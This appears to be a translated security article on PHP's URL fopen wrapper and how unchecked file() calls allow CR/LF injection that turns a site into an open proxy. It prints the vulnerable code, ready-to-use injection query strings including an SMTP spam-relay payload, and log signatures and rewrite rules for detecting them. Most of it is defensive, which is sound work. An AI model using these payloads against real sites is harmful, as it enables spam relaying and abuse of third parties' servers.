A potential vulnerability in PHP scripts

The functions fopen, file, include and require can open files from other sites over HTTP and FTP. This capability carries a potential vulnerability in PHP scripts: it lets an attacker use the site as a proxy.

I warn you in advance that there is nothing new in this material. Despite the impressive possibilities it offers an attacker, this vulnerability is simply a combination of well-known properties of PHP.


In 2002 several groups, independently searching for vulnerabilities in software, discovered a serious and powerful vulnerability in PHP.


On the Russian-language Internet this vulnerability has hardly been covered at all. On Russian-language security sites I could not find a direct report of it.

The vulnerability: the URL fopen wrapper


To add functionality and simplify coding, the PHP developers built the following feature into fopen, file, include and other functions: if the file name begins with http://, the interpreter performs an HTTP request, downloads the page and hands the content back as if it had been read from an ordinary file. The prefixes ftp:// and php:// (the latter is for reading stdin and writing stdout and stderr) work the same way. The intent was to spare site developers from writing HTTP request libraries by hand. The feature is switched on and off in the PHP configuration by the allow_url_fopen parameter.

CR/LF in HTTP requests


The carriage-return/line-feed pair separates headers in an HTTP request. Anton Kalmykov's article "Generating HTTP requests" <http://www.internet-technologies.ru/?url=http%3A%2F%2Fwww.phpclub.ru%2Farticle%2F2001-03-25> covers this in detail. In a GET request this pair can be passed as "%0D%0A".

Untrusted input


On many sites, pages are generated by a template script through which all of the site's requests are routed. The name of the file to open is taken from REQUEST_URI; the file is read, the template with navigation, header and so on is wrapped around it, and the result is sent to the client.


A careless or inexperienced programmer may open the file without any check of the data at all:



<?php
// $REQUEST_URI is the raw request path, available as a global here because
// register_globals is on; the first character (the slash) is dropped and the
// remainder is passed straight to file(), URL wrappers included.
echo implode("", file(substr($REQUEST_URI, 1)));
?>


The first character of the request, the slash, is discarded, and the file is opened. An attacker can easily supply a URL such as http://example.com as the path on the server: http://n00b.programmer.com/http://example.com. Another common variant is a site whose addresses all look like http://n00b.programmer.com/index.php?f=news; there the attacker will try to open an address such as http://n00b.programmer.com/index.php?f=http://example.com. It is very important not to trust incoming data and to filter incoming requests with regular expressions.



The exploit


Since in the example above the address is not checked at all, a complete HTTP request can be smuggled inside the request. If the attacker opens the path



index.php?f=http%3A%2F%2Fexample.com%2F+HTTP%2F1.0%0D%0AHost:+example.com%0D%0AUser-agent:+Space+Bizon%2F9%2E11%2E2001+%28Windows+67%29%0D%0Avar1%3Dfoo%26var2%3Dbar%0D%0A%0D%0A


then the script will send this HTTP request:



GET / HTTP/1.0\r\n
Host: example.com\r\n
User-agent: Space Bizon/9.11.2001 (Windows 67)\r\n
var1=foo&var2=bar\r\n
\r\n
 HTTP/1.0\r\n
Host: example.com\r\n
User-Agent: PHP/4.1.2\r\n
\r\n


The interpreter appends the last three lines (and the trailing blank line) automatically, but the two \r\n before them already mark the end of the request, so the target server treats everything after them as an ignored body. Thus the unprotected script can be used as a proxy. Knowing several such "holey" sites, an attacker can chain them to make himself harder to trace.
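To make the mechanism concrete, here is an added illustration (not code from the article): a small model of how a PHP 4-era HTTP wrapper assembled its request from the URL it was handed, fed with the query string above. The header set and the splitting logic are assumptions taken from the request shown in the article, not a copy of PHP's source; the point is that PHP URL-decodes the parameter before the script sees it, the wrapper never re-encodes or rejects CR/LF, and the first blank line decides where the target stops parsing.

```php
<?php
// Added illustration, not from the article: a model of a naive HTTP fopen
// wrapper. Header set and splitting rules are assumptions for the example.
declare(strict_types=1);

function build_wrapper_request(string $url, string $php_version = '4.1.2'): string
{
    // Drop the scheme and split host from path on the first slash.
    $rest  = preg_replace('#^https?://#i', '', $url);
    $slash = strpos($rest, '/');
    $host  = $slash === false ? $rest : substr($rest, 0, $slash);
    $path  = $slash === false ? '/'   : substr($rest, $slash);

    // Nothing here re-encodes or rejects CR/LF in $path: whatever the script
    // received (already URL-decoded by PHP into $_GET) goes straight on the wire.
    return "GET {$path} HTTP/1.0\r\n"
         . "Host: {$host}\r\n"
         . "User-Agent: PHP/{$php_version}\r\n"
         . "\r\n";
}

// Split a request the way the receiving server does: everything up to the
// first blank line is parsed, the rest is treated as body and ignored for GET.
function split_at_blank_line(string $request): array
{
    $parts = explode("\r\n\r\n", $request, 2);
    return [$parts[0], $parts[1] ?? ''];
}

// The query string from the article; parse_str() decodes it exactly as PHP
// does when it populates $_GET (so '+' becomes a space and %0D%0A becomes CR LF).
$query = 'f=http%3A%2F%2Fexample.com%2F+HTTP%2F1.0%0D%0AHost:+example.com'
       . '%0D%0AUser-agent:+Space+Bizon%2F9%2E11%2E2001+%28Windows+67%29'
       . '%0D%0Avar1%3Dfoo%26var2%3Dbar%0D%0A%0D%0A';
parse_str($query, $params);

$request = build_wrapper_request($params['f']);
[$seen_by_target, $appended_by_wrapper] = split_at_blank_line($request);

$show = fn(string $s): string => str_replace("\r\n", "\\r\\n\n", $s);
echo "Request as the target server parses it:\n", $show($seen_by_target), "\n\n";
echo "Bytes the wrapper added after the attacker's blank line (discarded):\n",
     $show($appended_by_wrapper);
```

Running it prints the attacker's request line and headers first and PHP's own " HTTP/1.0", Host and User-Agent lines second, which is exactly the request listed above.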



Clever use of the exploit


If a provider that gives free demo access has such a holey site, one could write a script for one's home server that sends requests through this proxy and save a little money. That is of course illegal and punishable, but on the whole petty. A more profitable use of someone else's machine as a proxy is sending commercial spam. An example from the article by Ulf Harnhammar <http://www.internet-technologies.ru/?url=http%3A%2F%2Farchives.neohapsis.com%2Farchives%2Fvulnwatch%2F2002-q3%2F0109.html>:



index.php?f=http%3A%2F%2Fmail.example.com%3A25%2F+HTTP%2F1.0%0D%0AHELO+my.own.machine%0D%0AMAIL+FROM%3A%3Cme%40my.own.machine%3E%0D%0ARCPT+TO%3A%3Cinfo%40site1.st%3E%0D%0ADATA%0D%0Ai+will+never+say+the+word+PROCRASTINATE+again%0D%0A.%0D%0AQUIT%0D%0A%0D%0A


(all on one line). The PHP module will connect to the server mail.example.com on port 25 and send the following:



GET / HTTP/1.0\r\n
HELO my.own.machine\r\n
MAIL FROM:<me@my.own.machine>\r\n
RCPT TO:<info@site1.st>\r\n
DATA\r\n
i will never say the word PROCRASTINATE again\r\n
.\r\n
QUIT\r\n
\r\n
 HTTP/1.0\r\n
Host: mail.example.com:25\r\n
User-Agent: PHP/4.1.2\r\n
\r\n


PHP and the mail server will both complain (the SMTP server rejects the "GET / HTTP/1.0" line as an unknown command, and PHP does not get an HTTP response back), but the letter is accepted and sent. With such a vulnerability on someone's site, one can go looking for closed mail relays that accept mail from the exploited web server. Such a relay will not be on the providers' black lists, and the spam run can be very effective. On my site I found a whole set of requests with port 25 in the path, and before the start of this year there were none. Earlier only a handful of curious users knew about this vulnerability; only in the last year has the hole become well known and put on stream by spammers.



Protective measures against the exploit


For you as the developer or owner of a site it is important to do everything possible so that nobody can send spam through your site. If it does happen, the spam will come from some Hawaiian dial-up whose owners do not understand human language, and you may be the one held responsible.

Checking the request log


To begin with, it is useful to review the list of unique addresses requested from the site. This will show whether there have been attacks or exploitation of the hole. Spammers usually first check whether they can reach the mail relay they need on port 25, so look for the strings ":25" and "%3A25". It is also worth looking for an encoded CR/LF pair ("%0D%0A", in either letter case) and for a whole URL passed as a parameter value ("=http%3A%2F%2F" or "=http://"): those are the signatures of a proxy probe even when no port is named.
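The search above can be automated. This is an added example, not part of the article: it scans access-log lines in Apache's common format for the three signatures (a port 25 in the requested address, a CR/LF pair, a URL inside a query parameter), checking each request both as sent and after URL-decoding so that neither the "%3A25" nor the literal ":25" spelling slips past. The log lines are constructed for the example.

```php
<?php
// Added example, not from the article. Sample log lines are constructed.
declare(strict_types=1);

const LOG_LINES = [
    '10.0.0.5 - - [12/Mar/2003:10:01:02 +0300] "GET /index.php?f=news HTTP/1.0" 200 4312',
    '10.0.0.9 - - [12/Mar/2003:10:03:44 +0300] "GET /index.php?f=http%3A%2F%2Fmail.example.com%3A25%2F+HTTP%2F1.0%0d%0aHELO+x%0d%0a HTTP/1.0" 200 88',
    '10.0.0.9 - - [12/Mar/2003:10:03:50 +0300] "GET /index.php?f=http://other.example.net:25/ HTTP/1.0" 200 88',
    '10.0.0.7 - - [12/Mar/2003:10:05:13 +0300] "GET /about HTTP/1.1" 200 1200',
];

// Each pattern is applied to the raw request target and to its decoded form.
const SUSPICIOUS = [
    'port-25'        => '#:25(?:/|\s|$)#',
    'crlf-injection' => '#[\r\n]#',
    'url-in-param'   => '#[?&][^=&]*=(?:https?|ftp)://#i',
];

// Pull the request target out of the first quoted field of a common-format line.
function request_target(string $line): ?string
{
    return preg_match('#"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"#', $line, $m) ? $m[1] : null;
}

// Return the names of every signature the line triggers (empty array if clean).
function classify(string $line): array
{
    $target = request_target($line);
    if ($target === null) {
        return [];
    }
    $decoded = rawurldecode($target);
    $hits = [];
    foreach (SUSPICIOUS as $name => $re) {
        if (preg_match($re, $target) === 1 || preg_match($re, $decoded) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

foreach (LOG_LINES as $line) {
    $hits = classify($line);
    if ($hits !== []) {
        echo implode(',', $hits), "\t", $line, "\n";
    }
}
```

Only the two lines from 10.0.0.9 are reported: the first with all three signatures, the second with port-25 and url-in-param. Feed it the real log with `while (($line = fgets($fh)) !== false)` in place of the constant array.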

Configuring PHP


The simplest way to remove the vulnerability is to forbid opening URLs through the file functions. If you administer the server, turn off allow_url_fopen in the PHP configuration. If you are merely a hosting client, turn it off for your own site: in the .htaccess file in the site root write the line php_value allow_url_fopen 0 (php_flag allow_url_fopen off does the same). If you are a strict hosting provider, you can forbid the URL fopen wrapper for all clients with the php_admin_value directive. Enabling safe mode does not help here; the function keeps working as usual. Two caveats for newer interpreters: since PHP 4.3.4 allow_url_fopen is a PHP_INI_SYSTEM setting, so it can only be set in php.ini or in the main server configuration (php_admin_value / php_admin_flag), not in .htaccess; and since PHP 5.2 URL inclusion by include and require is governed by the separate allow_url_include setting, which is off by default, while allow_url_fopen still governs fopen, file and file_get_contents.

Changing the code


A more difficult situation is also possible: you are a client, a careless hosting administrator has put all PHP settings into php_admin_value, and they cannot be changed. Then the scripts themselves must be modified. The simplest way is to find the fopen, file and include calls that open files by names taken from variables and cut the http:// and ftp:// prefixes out with str_replace. Note that a single str_replace pass is a weak filter: it is case-sensitive ("HTTP://" survives) and nested input such as "hthttp://tp://" collapses back to "http://" after one pass, so a whitelist of allowed names is the safer choice. However, sometimes a script really does need to open addresses supplied by the user: for example, a "pornolizer" script that inserts swear-words into a text or rewrites it in broken Russian. These sites have probably suffered most from careless programming. In that case it is enough, as far as header injection goes, to cut "\r\n" out of the received string; then the attacker cannot add his own headers to the request you send. He can still choose any host and port, though, so restrict the scheme to http and the port to the standard ones as well.
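The two code changes described above, written out as an added example that is not the article's own code: the template script from the beginning of the article in its vulnerable form, the hardened form that whitelists the page name and confines it to one directory (so no scheme, colon, slash or CR/LF can reach file() whatever allow_url_fopen says), and a validator for scripts that genuinely must fetch a user-supplied URL. The directory layout (pages/<name>.html) and the parameter name f are assumptions for the example.

```php
<?php
// Added example, not from the article. PAGE_DIR layout and ?f= are assumptions.
declare(strict_types=1);

const PAGE_DIR = __DIR__ . '/pages';

// Vulnerable form: whatever arrives in ?f= reaches file(), including
// "http://mail.example.com:25/ HTTP/1.0\r\nHELO ..." when allow_url_fopen is on.
function render_unsafe(string $f): string
{
    return implode('', file($f));
}

// Hardened form: accept only a short identifier, map it onto a file under
// PAGE_DIR, and confirm with realpath() that the result stayed inside it.
function render_safe(string $f): ?string
{
    if (!preg_match('/\A[a-z0-9_-]{1,64}\z/', $f)) {
        return null;                                  // reject, do not "clean"
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . $f . '.html');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                                  // missing, or outside PAGE_DIR
    }
    return file_get_contents($path);
}

// For a script that really has to fetch a user-supplied address (the
// "pornolizer" case): refuse control characters and whitespace, allow only
// http/https on the default ports, and no credentials in the URL.
// Stripping "\r\n" alone would still let the caller pick host and port.
function validate_fetch_url(string $url): ?string
{
    if (preg_match('/[\s\x00-\x1f\x7f]/', $url) === 1) {
        return null;                                  // CR, LF, NUL, spaces, ...
    }
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        return null;
    }
    if (!in_array(strtolower($p['scheme']), ['http', 'https'], true)) {
        return null;                                  // no ftp://, php://, file://
    }
    if (isset($p['port']) && !in_array($p['port'], [80, 443], true)) {
        return null;                                  // no :25 and friends
    }
    if (isset($p['user']) || isset($p['pass'])) {
        return null;
    }
    return $url;
}

// Front controller: the page name comes from ?f=, defaulting to "index".
$page = render_safe($_GET['f'] ?? 'index');
header('Content-Type: text/html; charset=utf-8');
if ($page === null) {
    http_response_code(404);
    echo 'No such page';
} else {
    echo $page;
}
```

With this in place, the probes from the article (f=http://example.com, f=http%3A%2F%2Fmail.example.com%3A25%2F+HTTP%2F1.0%0D%0A...) fail the identifier check before any file function is called, and validate_fetch_url() returns null for the port-25 and CR/LF variants while passing an ordinary http://example.com/page address through unchanged.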

Aborting on a hostile request


A client scanning your site for unchecked variables creates extra traffic and loads the server's processor. Obviously the pages your site generates are of no use to him unless they work as a proxy. It is desirable to kill such requests even before the PHP interpreter starts, and this can be done with mod_rewrite. In the .htaccess file in the root of my site I put this line:



RewriteRule ((%3A|:)25|%0D%0A) - [G]


This assumes that no form with multi-line user input is submitted on the site by the GET method; otherwise such submissions would be stopped by this rule. Bear in mind also that a RewriteRule pattern is matched against the URL path only; to catch these strings in the query string, where ?f=... lives, test the same pattern in a RewriteCond on %{QUERY_STRING} placed directly before the rule.


If you use mod_rewrite to support human-readable addressing, most likely colons and CRLF do not occur in your addresses. Then the other RewriteRule lines will not match a scanning request, and the line that stops request processing is best placed at the end of the rule list. Ordinary requests are then matched and redirected before they reach it (use the [L] flag), which reduces their processing time. The details will vary with the circumstances.